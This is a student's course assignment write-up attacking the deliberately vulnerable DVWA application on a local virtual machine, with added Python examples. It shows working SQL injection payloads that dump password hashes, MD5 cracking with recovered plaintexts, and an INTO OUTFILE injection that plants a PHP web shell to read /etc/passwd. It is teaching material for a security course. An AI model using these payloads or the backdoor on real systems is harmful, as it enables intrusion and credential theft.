
IA 5130, Computer Systems Security, Fall 2010. Assignment 4. Muhammad Taibah 000404916

As shown above, a new VM was created in VMware and booted from the DVWA live CD. We then ran the (ifconfig) command to find the VM's IP address (192.168.243.128), a private address assigned by VMware because the VM's network adapter was configured in NAT mode.

In NAT mode the VM can be reached from the host machine and from the other VMs on the same virtual network, but not from the outside network.

Now, let’s connect to it using the host machine.


It connects.

Using the provided credentials (admin/password) we log in to the application and set the security level to (low) as follows.

A notification box at the bottom of the page confirms that the security level has been changed to (low).


Now let's start with the second part of the assignment: performing an SQL injection to see how it works and to determine the underlying DBMS. Knowing the DBMS narrows the search for known flaws and bugs that can be used against it.

First let's test using user id (1).

Now we know that the application uses a MySQL DBMS as its back-end data source, as we can see below.


Let's see all DVWA accounts using the following SQL injection. We need to append our own condition to the SQL statement and comment out the rest of it. In MySQL the (#) sign starts a comment that runs to the end of the line, so whatever the PHP code appends after our input (such as the closing quote) is ignored by the database. What we want is to add an always-true condition so the query returns all the users stored in the database (e.g. OR 1=1). Because the conditions are joined with the logical operator (OR), only one sub-condition has to be true for the whole WHERE clause to be true, so every row matches. We will insert (1' OR true#) and this should return all users. Let's see.

It worked.


This gave us all the users. We know from the View Source button that this information comes from a table called (users), but as mentioned in the assignment sheet we usually don't have that privilege in the real world, so let's find the table name by injection. Before that we need the database name. We get it by injecting (1' union select database(),null#). We added null because the original query returns two columns, so our UNION must also return exactly two; null produces an empty value in the second field.

Now that we know the database name is (dvwa), we can find the table names from the information_schema database by injecting (1' union select table_name, null from information_schema.tables where table_schema = 'dvwa' #). This should return all the table names in that database.

So the tables in the (dvwa) database are (users) and (guestbook). Now let's select all users and passwords from the users table by injecting (1' union select password, user from users #).
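To make the reasoning above concrete, here is an added Python example (not part of the original assignment) that rebuilds DVWA's low-security lookup on an in-memory SQLite copy of the users table filled with constructed sample rows. SQLite does not accept MySQL's (#) comment, so the executed payloads use (-- ) with a trailing space instead; MySQL accepts both forms, so the (-- ) payloads work against DVWA as well. The example shows the raw query string the database receives, why the UNION must return two columns (the reason for the null above), and how a parameterized query defeats the same payloads.

```python
import sqlite3

# Constructed sample data mirroring DVWA's default users table
# (user_id, first_name, last_name, user, password, avatar). Passwords are
# unsalted MD5, as in DVWA.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99", "/hackable/users/admin.jpg"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03", "/hackable/users/gordonb.jpg"),
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b", "/hackable/users/1337.jpg"),
    (4, "Pablo", "Picasso", "pablo", "0d107d09f5bbe40cade3de5c71e9e9b7", "/hackable/users/pablo.jpg"),
    (5, "Bob", "Smith", "smithy", "5f4dcc3b5aa765d61d8327deb882cf99", "/hackable/users/smithy.jpg"),
]


def make_db():
    """In-memory SQLite stand-in for the dvwa.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT, avatar TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def dvwa_low_query(user_id):
    """Build the statement the way the low-security page does: the raw
    request value is concatenated into the SQL with no escaping at all.
    The returned string is exactly what MySQL receives."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"


def vulnerable_lookup(conn, user_id):
    """Run the concatenated query; injected SQL is executed as written."""
    return conn.execute(dvwa_low_query(user_id)).fetchall()


def union_needs_two_columns(conn):
    """A UNION whose column count differs from the original SELECT is a
    syntax error in MySQL and SQLite alike; this is why the writeup pads
    single-value payloads with null. Returns True when the engine rejects it."""
    try:
        vulnerable_lookup(conn, "1' UNION SELECT user FROM users -- ")
        return False
    except sqlite3.OperationalError:
        return True


def safe_lookup(conn, user_id):
    """The fix: bind the value as a parameter so the driver never lets it
    become part of the SQL text. The same payloads now match nothing."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(dvwa_low_query("1' OR true#"))
    print(vulnerable_lookup(db, "1' OR 1=1 -- "))
    print(vulnerable_lookup(db, "1' UNION SELECT password, user FROM users -- "))
    print(safe_lookup(db, "1' OR 1=1 -- "))
```

Note that the UNION result puts the hash in the first column (displayed by DVWA as "First name") and the login name in the second ("Surname"), which is the layout seen in the list below.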

Now that we have all the users, we need to crack the MD5-hashed passwords in the following list using a website such as (http://www.md5decrypter.co.uk/). Because the injected query selected (password, user), DVWA shows the hash in its "First name" column and the login name in its "Surname" column:

User: admin    MD5 hash: 5f4dcc3b5aa765d61d8327deb882cf99    Decrypted password: password

User: gordonb    MD5 hash: e99a18c428cb38d5f260853678922e03    Decrypted password: abc123

User: 1337    MD5 hash: 8d3533d75ae2c3966d7e0d4fcc69216b    Decrypted password: charley

User: Pablo    MD5 hash: 0d107d09f5bbe40cade3de5c71e9e9b7    Decrypted password: letmein

User: smithy    MD5 hash: 5f4dcc3b5aa765d61d8327deb882cf99    Decrypted password: password
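The same cracking step done offline, as an added Python example that is not part of the original writeup: a dictionary attack with hashlib over the hashes recovered above and a small constructed wordlist (a real run would use a large list such as rockyou.txt). Because DVWA stores unsalted MD5, a single pass over the wordlist covers every user at once, and identical hashes already reveal which users share a password before anything is cracked.

```python
import hashlib

# Hashes recovered from the users table in the writeup, keyed by login name.
RECOVERED = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "Pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed mini wordlist standing in for a real dictionary file.
WORDLIST = ["123456", "password", "qwerty", "abc123", "letmein", "charley", "dragon"]


def md5_hex(word):
    """Hex MD5 of a candidate password, matching DVWA's storage format."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_md5(hashes, wordlist):
    """Dictionary attack. Each candidate is hashed once and the targets are
    looked up in the resulting table, so cost is O(len(wordlist)) no matter
    how many users there are: with unsalted hashes nothing forces a separate
    pass per user. Users whose hash is not in the table map to None."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table.get(h) for user, h in hashes.items()}


def shared_passwords(hashes):
    """Group users by identical hash. Without a salt, equal hashes mean
    equal passwords, which is visible before any cracking takes place."""
    by_hash = {}
    for user, h in hashes.items():
        by_hash.setdefault(h, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    print(crack_md5(RECOVERED, WORDLIST))
    print(shared_passwords(RECOVERED))
```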

With this we have completed the second requirement of the assignment.

Going back to the first requirement, we need to grab all the underlying Linux system users. To do this we can run the command (cat /etc/passwd) on the command line. Now we need to find a way to execute this command via a PHP script and print the command output to the screen.

Testing phpinfo.php we find that it exists publicly and shows the web server's install directory (/opt/lampp).

Now we need a place where we can create files. Usually the target is the directory where uploaded files are stored, because the application must have permission to write to that directory.

In the application, viewing the source of the upload page shows the folder (hackable/uploads/), which can also be seen by injecting the following:

(1' UNION SELECT user,avatar FROM users #)

This means the application has permission to write files to (/opt/lampp/htdocs/hackable/uploads) on the server. Note that INTO OUTFILE is carried out by the MySQL server process, not by PHP, so the directory must also be writable by the user mysqld runs as, and the database account used by the application must hold MySQL's FILE privilege; the injection succeeding below shows both hold on this live CD.

We can inject the following to write a PHP file into that directory:

(1' UNION SELECT null,'<?php system($_GET[\'cmd\']); ?>' INTO OUTFILE '/opt/lampp/htdocs/hackable/uploads/taibah.php' #)

With this command we should have a small PHP file containing <?php system($_GET['cmd']); ?>, which gives us the ability to execute commands on the server. It also forms a backdoor, which accomplishes the third requirement of this assignment as well. Let's see how it works. First we insert the injection and submit it.


Afterwards we should be able to send commands using the GET method. We do this by requesting the PHP file (taibah.php) with (?cmd=) appended, followed by the desired command.

Let's try to get all the users.


The user accounts are: root, daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data, backup, list, irc, gnats, nobody, libuuid, syslog, dvwa, sshd, messagebus, usbmux, pulse, rtkit
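An added Python example (not from the original assignment) for this last step: building the request URL with the command properly percent-encoded, and parsing the returned /etc/passwd into account names instead of reading them off the screen, with a triage step that separates root and human accounts from system daemons. The base URL, the UID range (UID_MIN 1000 and UID_MAX 60000, the Debian/Ubuntu login.defs defaults) and the sample /etc/passwd lines are assumptions and constructed data, not the VM's real file.

```python
from urllib.parse import quote

# Assumed location of the dropped file on the DVWA VM (the exact web path
# may differ from the filesystem path shown in the writeup).
SHELL_URL = "http://192.168.243.128/hackable/uploads/taibah.php"


def shell_url(base, cmd):
    """URL that hands cmd to the file's system($_GET['cmd']).
    quote() with safe="" percent-encodes spaces and slashes so the command
    survives the trip through the browser and the web server; PHP decodes
    it again into $_GET before system() runs it."""
    return base + "?cmd=" + quote(cmd, safe="")


# Constructed excerpt in /etc/passwd format (name:pw:uid:gid:gecos:home:shell).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

dvwa:x:1000:1000:dvwa,,,:/home/dvwa:/bin/bash
"""


def parse_passwd(text):
    """Return (name, uid, shell) for each entry. Blank lines, comment lines
    and lines that do not have the seven colon-separated fields are skipped,
    so stray HTML or shell noise in the captured output does not break it."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        entries.append((name, int(uid), shell))
    return entries


def account_names(text):
    """All account names in file order, i.e. the list the assignment asks for."""
    return [name for name, _uid, _shell in parse_passwd(text)]


def interesting_accounts(text, uid_min=1000, uid_max=60000):
    """Triage: root plus human accounts (uid within the login.defs user range)
    that still have a real shell. Daemon accounts and nobody are left out,
    and an account with /usr/sbin/nologin cannot log in even if its password
    were known."""
    nologin = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}
    return [
        name
        for name, uid, shell in parse_passwd(text)
        if (uid == 0 or uid_min <= uid <= uid_max) and shell not in nologin
    ]


if __name__ == "__main__":
    print(shell_url(SHELL_URL, "cat /etc/passwd"))
    print(account_names(SAMPLE_PASSWD))
    print(interesting_accounts(SAMPLE_PASSWD))
```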

With this we have finished both the first and the extra-credit parts of the assignment.
